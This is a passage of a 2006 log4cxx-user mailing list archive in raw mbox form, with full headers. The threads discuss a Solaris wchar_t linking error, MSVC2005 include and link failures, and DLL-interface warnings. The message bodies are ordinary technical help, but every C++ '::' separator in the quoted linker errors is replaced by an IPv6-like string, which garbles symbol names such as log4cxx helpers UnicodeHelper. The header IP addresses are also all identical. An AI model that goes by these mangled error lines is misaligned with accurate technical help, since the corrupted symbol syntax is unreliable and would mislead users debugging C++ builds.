services PMC and can't prejudge that they would approve any particular release candidate. However, the hold up has been having a release candidate to vote on. And guess what I've been working on. I've got a request into ASF infrastructure to fix some directory permissions so that I can place items at http://people.apache.org/ builds/logging and that has been holding up a log4j-1.2.14 release candidate and vote. The same issue would also affect a log4cxx release candidate. I'm likely to put up a RC1 that even I know has some unfinished edges just to get some early feedback and not expect a formal vote until RC2 or later. Anyway, since this release will not be binary compatible with log4cxx-0.9.7, the minor version number must change, so I've been using 0.10.0 as the version number. From [email protected] Thu Sep 07 09:32:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84894 invoked from network); 7 Sep 2006 09:32:38 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 7 Sep 2006 09:32:38 -0000 Received: (qmail 82050 invoked by uid 500); 7 Sep 2006 09:32:36 -0000 Delivered-To: [email protected] Received: (qmail 82036 invoked by uid 500); 7 Sep 2006 09:32:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 82025 invoked by uid 99); 7 Sep 2006 09:32:36 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 07 Sep 2006 02:32:36 -0700 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=DNS_FROM_RFC_ABUSE,HTML_FONT_BIG,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO qvgsmtp2.airfrance.fr) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 07 Sep 2006 02:32:32 -0700 Received: from unknown (HELO xln22qvgsmtpo.france.airfrance.fr) ([161.129.204.104]) by qvgsmtp2.airfrance.fr with ESMTP; 07 Sep 2006 11:32:16 +0200 In-Reply-To: <[email protected]> To: "Log4CXX User" <[email protected]> Subject: Re: linking error whith 0.9.8 release MIME-Version: 1.0 X-Mailer: Lotus Notes Release 6.5.1 January 21, 2004 Message-ID: <[email protected]> From: Nicolas Bastien <[email protected]> Date: Thu, 7 Sep 2006 11:32:06 +0200 X-MIMETrack: MIME-CD by Router on SLM3QVI/QVI/GRAF/FR(652FP1HF37|March 08, 2005) at 07/09/2006 11:32:08, MIME-CD complete at 07/09/2006 11:32:08, Serialize by Router on SLN2SMTPOUT/INFO/QVG/GRAF/FR(Release 6.5.4FP1|June 19, 2005) at 09/07/2006 11:32:08 AM Content-type: multipart/related; Boundary="0__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B" X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B Content-type: multipart/alternative; Boundary="1__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B" --1__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B Content-type: text/plain; charset=ISO-8859-1 Content-transfer-encoding: quoted-printable thanks for the advice. I'm going to disable the wchar_t definition. I'm waiting to test the 0.10.0 RC1 brgs Nicolas BASTIEN |-----------------------------+----------------------------------------= ---| | Curt Arnold | = | | <[email protected]> | = | | | = A| | 07/09/2006 07:37 | Log4CXX User = | | | <[email protected].= apa| | Veuillez r=E9pondre =E0 | che.org> = | | "Log4CXX User" | = cc| | <[email protected]| = | | pache.org> | Ob= jet| | | Re: linking error whit= h | | | 0.9.8 release = | | | = | | | = | | | = | | | = | | | = | | | = | |-----------------------------+----------------------------------------= ---| On Sep 6, 2006, at 4:50 AM, Nicolas Bastien wrote: > Hi , > > i'm trying to compile the 0.9.8 version updated by svn, =A0with gcc > version 4.1.1on sparc-sun-solaris2.8 ( with apr , =A0apr-utils, > enable-unicode and =A0without cppunit) > > I've got a linking error =A0: > > > ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted > multiple inclusion of file > Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first reference= d > =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 in = file > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, > wchar_t*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&, > wchar_t const*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/ > liblog4cxx.so > ld: fatal: Symbol referencing errors. No output written to .libs/ > simplesocketserver > collect2: ld returned 1 exit status > make[1]: *** [simplesocketserver] Error 1 > make: *** [all-recursive] Error 1 > ln: cannot create liblog4cxx.so.9: File exists > ln: cannot create liblog4cxx.so: File exists > ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted > multiple inclusion of file > Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first reference= d > =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 in = file > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, > wchar_t*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&, > wchar_t const*)../src/.libs/liblog4cxx.so > log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.libs/ > liblog4cxx.so > ld: fatal: Symbol referencing errors. No output written to .libs/ > simplesocketserver > collect2: ld returned 1 exit status > make[1]: *** [simplesocketserver] Error 1 > make: *** [install-recursive] Error 1 > These specific unresolved references are the indicator that nature of wchar_t on a platform could not be determined which is known to occur on Solaris and Mac OS/X. =A0On Solaris, wchar_t can be either UCS-4 (most Solaris versions) or something else (on Traditional Chinese or Korean versions of Solaris). =A0Since the target character set is not known at compile time, the compiler does not set __STD_ISO_10646__ which would indicate that wchar_t is UCS-4. =A0The solution is to either suppress wchar_t support or to specify __STD_ISO_10646__ and limit your distribution to Solaris versions other than Traditional Chinese or Korean. =A0I believe the enable-unicode flag in the autotools build is misnamed, I believe it is the equivalent of has.wchar_t on the Ant build and indicates whether the wchar_t character type is supported. =A0Regardless of the state of those flags,= internal processing in log4cxx is always Unicode, but whether UTF-8 char's or wchar_t's are used depends on the settings and platform. Previously discussed in http://marc.theaimsgroup.com/?l=3Dlog4cxx- user&m=3D114313201623098&w=3D2 > Can you tell me when the 0.9.8 =A0is going to be released . > Thank you for your help > Any releases require a vote by the log4cxx committers and the logging services PMC and can't prejudge that they would approve any particular release candidate. =A0However, the hold up has been having a= release candidate to vote on. =A0And guess what I've been working on. I've got a request into ASF infrastructure to fix some directory permissions so that I can place items at http://people.apache.org/ builds/logging and that has been holding up a log4j-1.2.14 release candidate and vote. =A0The same issue would also affect a log4cxx release candidate. =A0I'm likely to put up a RC1 that even I know has some unfinished edges just to get some early feedback and not expect a formal vote until RC2 or later. =A0Anyway, since this release will not be binary compatible with log4cxx-0.9.7, the minor version number must change, so I've been using 0.10.0 as the version number. = --1__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B Content-type: text/html; charset=ISO-8859-1 Content-Disposition: inline Content-transfer-encoding: quoted-printable <html><body> <p><tt>thanks for the advice. I'm going to disable the wchar_t definiti= on. </tt><font size=3D"4"> </font><br> <tt>I'm waiting to test the 0.10.0 RC1 =A0</tt><font size=3D"4"> </font= ><br> <tt>brgs</tt><font size=3D"4"> </font><br> <br> Nicolas BASTIEN<br> <font size=3D"4"> </font><br> <br> <br> <br> <table width=3D"100%" border=3D"1"> <tr valign=3D"top"><td width=3D"41%"> <ul><b><font size=3D"2">Curt Arnold &lt;[email protected]&gt;</font></= b><font size=3D"2"> </font><font size=3D"4"> </font><br> <br> <font size=3D"2">07/09/2006 07:37</font><font size=3D"4"> </font> <table width=3D"100%" border=3D"1"> <tr valign=3D"top"><td width=3D"100%"><div align=3D"center"><font size=3D= "2">Veuillez r=E9pondre =E0</font><br> <font size=3D"2">&quot;Log4CXX User&quot; &lt;[email protected]= he.org&gt;</font></div></td></tr> </table> </ul> </td><td width=3D"60%"> <table width=3D"100%" border=3D"1"> <tr valign=3D"top"><td width=3D"9%"><div align=3D"right"><font size=3D"= 2">A</font></div></td><td width=3D"53%"> <ul><font size=3D"2">Log4CXX User &lt;[email protected]&g= t;</font><font size=3D"4"> </font></ul> </td></tr> <tr valign=3D"top"><td width=3D"9%"><div align=3D"right"><font size=3D"= 2">cc</font></div></td><td width=3D"53%"><img src=3D"cid:10__=3D4EBBFB7= [email protected]" border=3D"0" height=3D"1" width=3D"1= " alt=3D""></td></tr> <tr valign=3D"top"><td width=3D"9%"><div align=3D"right"><font size=3D"= 2">Objet</font></div></td><td width=3D"53%"> <ul><font size=3D"2">Re: linking error whith 0.9.8 release</font></ul> </td></tr> </table> <ul> <table width=3D"100%" border=3D"1"> <tr valign=3D"top"><td width=3D"0%"><img src=3D"cid:10__=3D4EBBFB71DFA0= [email protected]" border=3D"0" height=3D"1" width=3D"1" alt= =3D""></td><td width=3D"0%"><img src=3D"cid:10__=3D4EBBFB71DFA0AF6B8f9e= [email protected]" border=3D"0" height=3D"1" width=3D"1" alt=3D""></= td></tr> </table> </ul> </td></tr> </table> <tt>On Sep 6, 2006, at 4:50 AM, Nicolas Bastien wrote:</tt><br> <br> <tt>&gt; Hi ,</tt><br> <tt>&gt;</tt><br> <tt>&gt; i'm trying to compile the 0.9.8 version updated by svn, =A0wit= h gcc =A0</tt><br> <tt>&gt; version 4.1.1on sparc-sun-solaris2.8 ( with apr , =A0apr-utils= , =A0</tt><br> <tt>&gt; enable-unicode and =A0without cppunit)</tt><br> <tt>&gt;</tt><br> <tt>&gt; I've got a linking error =A0:</tt><br> <tt>&gt;</tt><br> <tt>&gt;</tt><br> <tt>&gt; ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted = =A0</tt><br> <tt>&gt; multiple inclusion of file</tt><br> <tt>&gt; Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first re= ferenced</tt><br> <tt>&gt; =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 = =A0 in file</tt><br> <tt>&gt; log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, =A0<= /tt><br> <tt>&gt; wchar_t*)../src/.libs/liblog4cxx.so</tt><br> <tt>&gt; log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&amp= ;, =A0</tt><br> <tt>&gt; wchar_t const*)../src/.libs/liblog4cxx.so</tt><br> <tt>&gt; log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.li= bs/ </tt><br> <tt>&gt; liblog4cxx.so</tt><br> <tt>&gt; ld: fatal: Symbol referencing errors. No output written to .li= bs/ </tt><br> <tt>&gt; simplesocketserver</tt><br> <tt>&gt; collect2: ld returned 1 exit status</tt><br> <tt>&gt; make[1]: *** [simplesocketserver] Error 1</tt><br> <tt>&gt; make: *** [all-recursive] Error 1</tt><br> <tt>&gt; ln: cannot create liblog4cxx.so.9: File exists</tt><br> <tt>&gt; ln: cannot create liblog4cxx.so: File exists</tt><br> <tt>&gt; ld: warning: file /app/DINB/local/lib/libstdc++.so: attempted = =A0</tt><br> <tt>&gt; multiple inclusion of file</tt><br> <tt>&gt; Undefined =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 first re= ferenced</tt><br> <tt>&gt; =A0symbol =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 = =A0 in file</tt><br> <tt>&gt; log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bncodeWide(unsigned int, =A0<= /tt><br> <tt>&gt; wchar_t*)../src/.libs/liblog4cxx.so</tt><br> <tt>&gt; log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bodeWide(wchar_t const*&amp= ;, =A0</tt><br> <tt>&gt; wchar_t const*)../src/.libs/liblog4cxx.so</tt><br> <tt>&gt; log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bUnicodeHelperacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blengthUTF8(wchar_t)../src/.li= bs/ </tt><br> <tt>&gt; liblog4cxx.so</tt><br> <tt>&gt; ld: fatal: Symbol referencing errors. No output written to .li= bs/ </tt><br> <tt>&gt; simplesocketserver</tt><br> <tt>&gt; collect2: ld returned 1 exit status</tt><br> <tt>&gt; make[1]: *** [simplesocketserver] Error 1</tt><br> <tt>&gt; make: *** [install-recursive] Error 1</tt><br> <tt>&gt;</tt><br> <tt>These specific unresolved references are the indicator that nature = of =A0</tt><br> <tt>wchar_t on a platform could not be determined which is known to occ= ur =A0</tt><br> <tt>on Solaris and Mac OS/X. =A0On Solaris, wchar_t can be either UCS-4= =A0</tt><br> <tt>(most Solaris versions) or something else (on Traditional Chinese o= r =A0</tt><br> <tt>Korean versions of Solaris). =A0Since the target character set is n= ot =A0</tt><br> <tt>known at compile time, the compiler does not set __STD_ISO_10646__ = =A0</tt><br> <tt>which would indicate that wchar_t is UCS-4. =A0The solution is to =A0= </tt><br> <tt>either suppress wchar_t support or to specify __STD_ISO_10646__ and= =A0</tt><br> <tt>limit your distribution to Solaris versions other than Traditional = =A0</tt><br> <tt>Chinese or Korean. =A0I believe the enable-unicode flag in the =A0<= /tt><br> <tt>autotools build is misnamed, I believe it is the equivalent of =A0<= /tt><br> <tt>has.wchar_t on the Ant build and indicates whether the wchar_t =A0<= /tt><br> <tt>character type is supported. =A0Regardless of the state of those fl= ags, =A0</tt><br> <tt>internal processing in log4cxx is always Unicode, but whether UTF-8= =A0</tt><br> <tt>char's or wchar_t's are used depends on the settings and platform.<= /tt><br> <br> <tt>Previously discussed in <a href=3D"http://marc.theaimsgroup.com/?l=3D= log4cxx-">http://marc.theaimsgroup.com/?l=3Dlog4cxx-</a> </tt><br> <tt>user&amp;m=3D114313201623098&amp;w=3D2</tt><br> <br> <tt>&gt; Can you tell me when the 0.9.8 =A0is going to be released .</t= t><br> <tt>&gt; Thank you for your help</tt><br> <tt>&gt;</tt><br> <br> <tt>Any releases require a vote by the log4cxx committers and the loggi= ng =A0</tt><br> <tt>services PMC and can't prejudge that they would approve any =A0</tt= ><br> <tt>particular release candidate. =A0However, the hold up has been havi= ng a =A0</tt><br> <tt>release candidate to vote on. =A0And guess what I've been working o= n. =A0 </tt><br> <tt>I've got a request into ASF infrastructure to fix some directory =A0= </tt><br> <tt>permissions so that I can place items at <a href=3D"http://people.a= pache.org/">http://people.apache.org/</a> </tt><br> <tt>builds/logging and that has been holding up a log4j-1.2.14 release = =A0</tt><br> <tt>candidate and vote. =A0The same issue would also affect a log4cxx =A0= </tt><br> <tt>release candidate. =A0I'm likely to put up a RC1 that even I know h= as =A0</tt><br> <tt>some unfinished edges just to get some early feedback and not expec= t =A0</tt><br> <tt>a formal vote until RC2 or later. =A0Anyway, since this release wil= l =A0</tt><br> <tt>not be binary compatible with log4cxx-0.9.7, the minor version numb= er =A0</tt><br> <tt>must change, so I've been using 0.10.0 as the version number.</tt><= br> <br> <br> </body></html>= --1__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B-- --0__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B Content-type: image/gif; name="ecblank.gif" Content-Disposition: inline; filename="ecblank.gif" Content-ID: <[email protected]> Content-transfer-encoding: base64 R0lGODlhEAABAIAAAAAAAP///yH5BAEAAAEALAAAAAAQAAEAAAIEjI8ZBQA7 --0__=4EBBFB71DFA0AF6B8f9e8a93df938690918c4EBBFB71DFA0AF6B-- From [email protected] Tue Sep 12 18:10:25 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47237 invoked from network); 12 Sep 2006 18:10:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Sep 2006 18:10:25 -0000 Received: (qmail 52323 invoked by uid 500); 12 Sep 2006 18:10:24 -0000 Delivered-To: [email protected] Received: (qmail 52258 invoked by uid 500); 12 Sep 2006 18:10:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 52240 invoked by uid 99); 12 Sep 2006 18:10:22 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 12 Sep 2006 11:10:22 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=permerror X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received-SPF: error (idunn.apache.osuosl.org: domain criticaltech.com from 161.129.204.104 cause and error) Received: from ([161.129.204.104:17461] helo=mail1.criticaltech.com) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id 42/30-04030-718F6054 for <[email protected]>; Tue, 12 Sep 2006 11:10:33 -0700 Received: from OKC2.criticaltech.com ([161.129.204.104]) by mail1.criticaltech.com with Microsoft SMTPSVC(603)363-6787); Tue, 12 Sep 2006 13:08:41 -0500 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1257" Content-Transfer-Encoding: quoted-printable Subject: MSVC2005 question Date: Tue, 12 Sep 2006 13:07:53 -0500 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: MSVC2005 question Thread-Index: AcbRmgdoSo+SydISS1eRlHFio359UwE+r+Fw From: "Scott McFadden" <[email protected]> To: <[email protected]> Cc: "Tom Rhineberger" <[email protected]> X-OriginalArrivalTime: 12 Sep 2006 18:08:41.0712 (UTC) FILETIME=[7A9BFF00:01C6D696] X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I can't get my log4cxx based code to compile when I add the = log4cxx/include folder to my project settings / additional includes. If = I add the log4cxx\include folder as a global include value for the IDE = ("Tools/Options/Projects & Solutions/VS Dirs/Include") it works fine. = Is there any particular reason log4cxx defines all their includes using = <header.h> notation instead of "header.h"? Thanks -----Original Message----- From: [email protected] = [mailto:[email protected]]=20 Sent: Wednesday, September 06, 2006 4:51 AM To: [email protected] Subject: log4cxx-user Digest 6 Sep 2006 09:51:13 -0000 Issue 260 log4cxx-user Digest 6 Sep 2006 09:51:13 -0000 Issue 260 Topics (messages 1682 through 1685): Re: How create 1 log file for a day? 1682 by: Borut Had=C5=BEiali=C4=87 1684 by: val Unable to add appender to AsyncAppender 1683 by: Adams Christian linking error whith 0.9.8 release 1685 by: Nicolas Bastien Administrivia: To subscribe to the digest, e-mail: [email protected] To unsubscribe from the digest, e-mail: [email protected] To post to the list, e-mail: [email protected] ---------------------------------------------------------------------- From [email protected] Tue Sep 12 19:02:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 57952 invoked from network); 12 Sep 2006 19:02:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Sep 2006 19:02:30 -0000 Received: (qmail 20655 invoked by uid 500); 12 Sep 2006 19:02:29 -0000 Delivered-To: [email protected] Received: (qmail 20640 invoked by uid 500); 12 Sep 2006 19:02:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 20629 invoked by uid 99); 12 Sep 2006 19:02:29 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 12 Sep 2006 12:02:29 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=permerror X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received-SPF: error (idunn.apache.osuosl.org: domain criticaltech.com from 161.129.204.104 cause and error) Received: from ([161.129.204.104:17936] helo=mail1.criticaltech.com) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id D0/10-04378-E4407054 for <[email protected]>; Tue, 12 Sep 2006 12:02:39 -0700 Received: from OKC2.criticaltech.com ([161.129.204.104]) by mail1.criticaltech.com with Microsoft SMTPSVC(603)363-6787); Tue, 12 Sep 2006 14:00:48 -0500 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Subject: MSVC2005 Link Error in 0.9.8 Date: Tue, 12 Sep 2006 14:00:01 -0500 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: MSVC2005 Link Error in 0.9.8 Thread-Index: AcbWlr3NuW+HgRpJSsS7GZdLz4kY9AABitww From: "Scott McFadden" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 12 Sep 2006 19:00:48.0873 (UTC) FILETIME=[C28AE590:01C6D69D] X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N My log4cxx code compiles fine but fails to link with the following error: Error 1 error LNK2019: unresolved external symbol "__declspec(dllimport) public: static class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bhelpersacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObjectPtrT<class log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLogger> __cdecl log4cxxacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLoggeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bgetLogger(char const * const)" (__imp_?getLogger@Logger@log4cxx@@SA?AV?$ObjectPtrT@VLogger@log4cxx@@@he lpers@2@QBD@Z) referenced in function "void __cdecl `dynamic initializer for 'logger''(void)" (??__Elogger@@YAXXZ) ExchangePumpGUI.obj=09 I have unsuccessfully tried linking against: log4cxx\build\release\shared\log4cxx.lib and log4cxx\build\debug\shared\log4cxxd.lib Anyone else had linking problems in MSVC2005? Thanks! From [email protected] Thu Sep 14 08:45:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24083 invoked from network); 14 Sep 2006 08:45:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 08:45:48 -0000 Received: (qmail 56769 invoked by uid 500); 14 Sep 2006 08:45:46 -0000 Delivered-To: [email protected] Received: (qmail 56749 invoked by uid 500); 14 Sep 2006 08:45:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 56738 invoked by uid 99); 14 Sep 2006 08:45:46 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 01:45:46 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cedar.ugent.be) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 01:45:36 -0700 Received: from localhost (bonobo.ugent.be [161.129.204.104]) by cedar.ugent.be (Postfix) with ESMTP id 906D22A4177 for <[email protected]>; Thu, 14 Sep 2006 10:45:04 +0200 (CEST) Received: from cedar.ugent.be ([161.129.204.104]) by localhost (bonobo.UGent.be [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 01668-09 for <[email protected]>; Thu, 14 Sep 2006 10:45:01 +0200 (CEST) Received: from tnisoft.com (tni20.elis.UGent.be [161.129.204.104]) by cedar.ugent.be (Postfix) with ESMTP id C8FF52A4175 for <[email protected]>; Thu, 14 Sep 2006 10:44:58 +0200 (CEST) Subject: Dll-interface warnings Date: Thu, 14 Sep 2006 10:44:57 +0200 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-MS-Has-Attach: X-MS-TNEF-Correlator: Content-class: urn:content-classes:message X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Thread-Topic: Dll-interface warnings thread-index: AcbX2g7a4C8Y7kqLSKeZ4Se0NPqUgg== From: "Merijn Vandenabeele" <[email protected]> To: <[email protected]> X-Virus-Scanned: by UGent DICT X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, hits=-5.689 tagged_above=-999 required=6.31 tests=ALL_TRUSTED, AWL, BAYES_00 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi, Because version 0.9.7 of log4cxx isn't recommended, I'm building the CVS Head following the instructions that came with the source. Building the libs runs smooths (VS2003), but when I use the libs in my project, I get a lot of dll-interface warnings when compiling. I didn't get these with version 0.9.7 so I guess I'm overlooking something? I searched the mailing list archives but found close to nothing on this subject. Can somebody help me out or should I just ignore the warnings? Thanks in advance, Merijn From [email protected] Thu Sep 14 09:03:36 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28034 invoked from network); 14 Sep 2006 09:03:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Sep 2006 09:03:36 -0000 Received: (qmail 79844 invoked by uid 500); 14 Sep 2006 09:03:35 -0000 Delivered-To: [email protected] Received: (qmail 79827 invoked by uid 500); 14 Sep 2006 09:03:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 79816 invoked by uid 99); 14 Sep 2006 09:03:35 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 14 Sep 2006 02:03:35 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=permerror X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received-SPF: error (idunn.apache.osuosl.org: domain hi.pi.titech.ac.jp from 161.129.204.104 cause and error) Received: from ([161.129.204.104:40905] helo=vc1.net.titech.ac.jp) by idunn.apache.osuosl.org (ecelerity 2.1 r(10620)) with ESMTP id FC/70-03980-99A19054 for <[email protected]>; Thu, 14 Sep 2006 02:03:32 -0700 Received: from vc1.local (localhost.localdomain [161.129.204.104]) by vc1.local (Postfix) with ESMTP id 299781D3593 for <[email protected]>; Thu, 14 Sep 2006 18:02:15 +0900 (JST) Received: from [161.129.204.104] (zenigata.pi.titech.ac.jp [161.129.204.104]) by vc1.net.titech.ac.jp (Postfix) with ESMTP id 149A81D332C for <[email protected]>; Thu, 14 Sep 2006 18:02:15 +0900 (JST) Message-ID: <[email protected]> Date: Thu, 14 Sep 2006 18:02:14 +0900 From: Salvati Marc <[email protected]> User-Agent: Mozilla Thunderbird 1.0.2 